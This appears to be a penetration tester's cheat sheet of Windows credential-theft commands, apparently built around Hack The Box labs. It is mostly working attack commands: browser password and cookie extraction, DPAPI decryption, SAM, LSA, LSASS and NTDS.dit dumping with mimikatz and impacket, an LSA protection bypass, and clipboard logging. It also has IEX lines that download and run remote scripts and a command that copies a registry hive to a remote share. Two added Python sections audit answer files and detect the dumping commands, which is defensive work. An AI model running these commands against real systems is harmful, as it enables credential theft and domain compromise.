Credential Attacks on Windows

Web Credentials

PS C:\> start lazagne.exe all
PS C:\> .\SharpChrome.exe logins /unprotect

PS C:\> vaultcmd /list
PS C:\> vaultcmd /listcreds:"Web Credentials" /all

#-----------EDGE---------------------------------
#Extract credentials from the Edge browser (the DPAPI-protected key is stored in Local State)
PS C:\> (Get-Content "C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /encryptedkey:<SNIF>e4x8+n0VDX82CffsyVmOzvSraXQ== /unprotect

#-----------Firefox-------------------------------
#Extract passwords from Mozilla Firefox profiles
Intrusionz3r0@htb[/htb]$ python firefox_decrypt.py /folder/containing/profiles.ini/

#Cookies
#Path: %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d

#---------Chromium--------------------------------
PS C:\> (Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

#Cookies
#Path: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
#Invoke-SharpChromium reads the legacy Default\Cookies location, so copy the current Network\Cookies file there first
PS C:\> copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"

Credential Manager

#List saved credentials
PS C:\> cmdkey /list

#Enumerate Windows credentials
PS C:\> vaultcmd /listcreds:"Windows Credentials" /all

C:\Temp> SharpDPAPI.exe machinecredentials

#Location of the user's DPAPI master keys (one file per master key GUID)
#Path: C:\Users\<user>\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\556a2412-xxxx-4ccf-b721-e6a0b4f90407

#1. Decrypt the master key (requires the user's password)
mimikatz "dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\556a2412-xxxx-4ccf-b721-e6a0b4f90407 /password:MYPASSWORD123 /protected" exit

#2. Decrypt the credential blob with the recovered master key
mimikatz "dpapi::cred /in:C:\Users\user\AppData\Roaming\Microsoft\Credentials\C8XXXXXXXXXXXXXXXXXXXXXXXX1B9 /masterkey:d9a<SNIF>f319e9c84" exit

DPAPI

#Using DonPAPI (best option)
donpapi collect -u 'John.ford' -H 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' --collectors All --target vdixx.eu-xxxx.vl -d eu-xxxx.vl --dc-ip xx.xx.xx.xx

#Using netexec
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi cookies
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi nosystem
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem

Search Credentials

Extract credentials using SessionGopher

PS C:\htb> Import-Module .\SessionGopher.ps1
PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01

Sniff passwords and hashes with net-creds

Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0

Search credentials in the registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # Windows Autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters (community strings)
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # PuTTY sessions, including clear-text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3" /v Password # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\htb> Get-ChildItem -Path C:\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\htb> Get-ChildItem -Path "C:\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line

Search for filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\htb> dir \confidentials.txt /s /p
PS C:\htb> Get-ChildItem -Path C:\ -Filter "confidentials.txt" -Recurse

Passwords in unattend.xml

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
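An added Python example (not from the original page) that audits answer files such as the ones listed above for Password elements that still hold a value, reporting the element name and whether PlainText is set, without printing the secret itself; the sample XML is constructed, and audit_paths silently skips paths that do not exist on the host where it runs.

```python
import xml.etree.ElementTree as ET

NS = "{urn:schemas-microsoft-com:unattend}"

# Constructed sample (not from a real host): one base64-encoded (PlainText=false)
# and one clear-text (PlainText=true) password, as a sysprep answer file would hold them.
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>U3VwZXJTZWNyZXQxMjNQYXNzd29yZA==</Value><PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
      <AutoLogon>
        <Password><Value>Winter2024!</Value><PlainText>true</PlainText></Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""

def find_password_elements(xml_text):
    """(element_name, is_plaintext) for each *Password element with a non-empty Value; the secret is never returned."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.replace(NS, "")
        if not tag.endswith("Password"):
            continue
        value = el.find(NS + "Value")
        if value is None or not (value.text or "").strip():
            continue  # already wiped by sysprep, nothing to report
        plain = el.find(NS + "PlainText")
        findings.append((tag, plain is not None and (plain.text or "").strip().lower() == "true"))
    return findings

def audit_paths(paths):
    """Audit each path that exists on this host; a file that is not XML maps to None."""
    results = {}
    for p in paths:
        try:
            with open(p, encoding="utf-8-sig") as fh:
                results[p] = find_password_elements(fh.read())
        except OSError:
            continue  # path does not exist here
        except ET.ParseError:
            results[p] = None  # e.g. sysprep.inf is an INI file, not XML
    return results
```

Run audit_paths over the five paths listed above on a build host to confirm sysprep /generalize actually cleared the values.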

Retrieve PuTTY credentials from the registry

PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<value>

PowerShell

PowerShell History File

C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\> cat (Get-PSReadlineOption).HistorySavePath

PowerShell Transcript

PS C:\> gc C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
PS C:\> gc C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt

Recover credentials from PowerShell scripts

First Option:

PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username
PS C:\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!

Second Option:

PS C:\> $user = "Administrator"
PS C:\> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
PS C:\> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS C:\> $cred.GetNetworkCredential() | Format-List

Alternate Data Stream

Retrieve credentials from alternate data streams

PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag

Clipboard

Monitor Clipboard

PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\htb> Invoke-ClipboardLogger

Sensitive Files

IIS Web config

PS C:\> Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Retrieve saved Wi-Fi passwords

C:\htb> netsh wlan show profile
C:\htb> netsh wlan show profile <ssid-name> key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

Sticky Notes

#Path: C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal

PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Copying the SAM, SYSTEM and SECURITY hives

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

Dumping SAM and SYSTEM

Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam

Dump LSA

Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa

Dump LSASS

#Find the LSASS PID from cmd
C:\Windows\system32> tasklist /svc

#Find the LSASS PID from PowerShell
PS C:\Windows\system32> Get-Process lsass
#----------------------------------------

#Create the LSASS memory dump (672 is the PID found above)
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

#Parse the lsass.dmp file offline, or read LSASS directly with mimikatz
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp
C:\Windows\system32> .\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit

Dump lsass using RDP session

Dump NTDS.dit

To copy the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) rights, or equivalent.

#List the local groups
C:\> net localgroup

#Check the user's group membership
C:\> net user bwilliamson

#Create a shadow copy of the C: volume (NTDS.dit is locked while AD is running)
C:\> vssadmin CREATE SHADOW /For=C:

#Copy NTDS.dit out of the shadow copy
C:\> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

#Extracting credentials from NTDS.dit with DSInternals (the SYSTEM hive supplies the boot key)
PS C:\htb> Import-Module .\DSInternals.psd1
PS C:\htb> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

# Fastest way to steal the NTDS.
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds
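The LSASS minidump, hive export and NTDS shadow-copy commands above leave distinctive process command lines. The following added Python example (not from the original page) runs a few detection rules over constructed Sysmon-style process-creation records; the event fields and rule names are assumptions made for this example.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry): the first four
# are the commands from this page, the last two are benign look-alikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save hklm\sam C:\sam.save"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin CREATE SHADOW /For=C:"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin list shadows"},
]

# Rule names are assumptions for this example. Matching is case-insensitive because cmd.exe is.
RULES = [
    ("lsass_minidump_comsvcs", re.compile(r"comsvcs\.dll.*\bMiniDump\b", re.I)),
    ("sam_hive_export", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("shadow_copy_create", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("ntds_copy_from_shadow", re.compile(r"HarddiskVolumeShadowCopy\d+.*\bNTDS\.dit\b", re.I)),
]

def classify(command_line):
    """Names of every rule that matches one command line (empty list when none do)."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(events):
    """Map the index of each suspicious event to its matched rule names; benign events are omitted."""
    hits = {}
    for i, ev in enumerate(events):
        names = classify(ev.get("CommandLine", ""))
        if names:
            hits[i] = names
    return hits

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(idx, names, SAMPLE_EVENTS[idx]["CommandLine"])
```

The same rules map directly onto a SIEM query over Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled.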

Mimikatz

# Dump the local SAM database 
mimikatz lsadump::sam

#Dump LSA 
mimikatz lsadump::lsa /inject

#Dump secrets
mimikatz lsadump::secrets

# Dump the logon passwords
mimikatz sekurlsa::logonpasswords

# Dump the encryption keys used by Kerberos.
mimikatz sekurlsa::ekeys

# Dump Domain Cached Credentials
mimikatz lsadump::cache

#Dump trust secrets
mimikatz lsadump::trust

Bypassing LSA protection

Error: ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords
